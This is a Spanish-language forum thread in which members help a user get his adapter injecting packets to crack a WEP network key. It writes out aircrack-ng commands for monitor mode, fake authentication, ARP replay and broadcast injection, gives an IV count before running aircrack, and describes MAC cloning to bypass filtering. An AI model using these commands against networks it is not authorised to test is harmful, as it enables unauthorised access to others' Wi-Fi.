Seguridad Wireless - Wifi
Equipos y materiales => Tarjetas de Red Wireless => Adaptadores wireless USB => Mensaje iniciado por: carlos_sa83 en 13-05-2011, 00:04 (Viernes)
-
No consigo que inyecte ni en wifislax ni en wifiway, no se configurarla para que inyecte, y he mirado ya mil cosas y nada. Me captura un dato cada minuto.
-
Hola
Mi primera auditoria
Link:
https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/mi-primera-auditor237a/
Saludos.
-
Me los he leido y no encuentro la forma de cambiar la configuracion de la tarjeta.
Dandole a iwconfig wlan0 me sale esto:
RTS thr:off
Fragment thr:off
Encryption key: off
Power Management: off
y no se cambiarlos para poner en on y que inyecte. Gracias.
-
1º la tienes que poner en modo monitor.
2º lanzar airudump-ng para capturar
3º asociarte con una A1 si no hay cliente asociado.
4º empezar la reinyeccion con un A3.
con esto y el enlace que te han dejado ya tienes mas que suficiente para empezar, tambien puedes usar el buscador del foro.
lo que preguntas y como lo preguntas esta explicado mil veces en mil temas, es absolutamente lo mas basico de lo basico, no nos lo hagas volver a repetir.
lee un poco y si te atascas con algo haz preguntas concretas, el tipo "no se nada explicamelo todo" en este foro es dificl que lo consigas.
un saludo
-
Hago esto:
- airmon-ng
- airmon-ng start wlan0 ( mode monitor )
- ifconfig wlan0 down
- macchanger -m 00:11:22:33:44:55 wlan0
- ifconfig wlan0 up
- airodump-ng wlan0
Y en este paso me sale este mensaje:
ioctl (SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run "airmon-ng start wlan0 "
Sysfs injection support was not found either.
-
Hago esto:
- airmon-ng
- airmon-ng start wlan0 ( mode monitor )
- ifconfig wlan0 down
- macchanger -m 00:11:22:33:44:55 wlan0
- ifconfig wlan0 up
- airodump-ng wlan0
Y en este paso me sale este mensaje:
ioctl (SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run "airmon-ng start wlan0 "
Sysfs injection support was not found either.
airodump-ng mon0
-
upssss, es verdad, pongo esto:
- airmon-ng
- airmon-ng start wlan0 ( mode monitor )
- ifconfig wlan0 down
- macchanger -m 00:11:22:33:44:55 wlan0
- ifconfig wlan0 up
- airodump-ng mon0
airodump-ng --bssid 40:4a:03:af:30:xx -c chanel -w nombre_archivo mon0
Aireplay-ng –3 –b 40:4A:03:AF:30:xx –d 00:c0:ca:4f:31:xx mon0
Y lee paquetes, pero no obtengo arp ni envia paquetes ni nada
-
bueno, veo que la cosa mejora.
¿hay que cliente conectado que genere trafico? si no lo hay tienes que hacer un A1 antes del A3
- aireplay-ng -1 30 -e ESSID -a MAC_AP -h TU_MAC mon0
después ya puedes hacer el A3, pero tienes mal un argumento.
- Aireplay-ng –3 –b 40:4A:03:AF:30:xx –h 00:c0:ca:4f:31:xx mon0
te recomiendo que no cambies la MAC, hay muchos routers que ya no aceptan ese tipo de acción, ademas es que no sirve para nada, cambiar la MAC se usa para vulnerar el filtrado MAC clonando la MAC de un cliente con autorización.
también ármate de paciencia, estos ataques pueden funcionar en 3 minutos o nunca llegar a reinyectar.
en este tema tienes comandos mas actualizados para los ataques que estás intentando.
https://foro.seguridadwireless.net/wifiway-1-0-fnal-y-anteriores/como-que-no-se-puede-en-3-minutos/
un saludo
-
Aparte de lo que ha dicho drvalium, añado lo siguiente:
Intenta hacer el ataque broadcast. Es un ataque que intenta inyectar cualquier paquete que captures. Este paquete puede ser grande o pequeño (generalmente mas grande que un arp request). Cuanto mas grande el paquete, menos ratio de inyeccion. Es el ataque que tarda menos en inyectar, por regla general, pero tambien el que menos ratio de inyeccion tiene.
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -m TAM_MIN_PACKET -n TAM_MAX_PACKET -b BSSID -h MAC -x INJECTION_RATE INTERFACE
Recomiendo usar TAM_MIN_PACKET como 68 y TAM_MAX_PACKET como 150
Paquetes de mas de 150 de lenght producen un inyection rate demasiado bajo.
-
Perfecto, ya ha empezado a inyectar, le ha costado 10 minutos pero ya va.
Cuantos ARP necesito???
Muchas gracias.
-
Perfecto, ya ha empezado a inyectar, le ha costado 10 minutos pero ya va.
Cuantos ARP necesito???
Muchas gracias.
Son IVS, no ARP'S (1 arp puede generar mas de 1 iv).
A partir de 20.000 yo ya empezaria a meterle aircrack.
-
ahora digo yo que para que se hacen los tutoriales ?
la verdad que es una pena de la gente que malgasta su tiempo para que otros ni los lean
carlos_sa83 tu problema no era de injectar con la alfa , pues yo creo que es este no tienes ni p idea de auditoria
https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/mi-primera-auditor237a/
salu2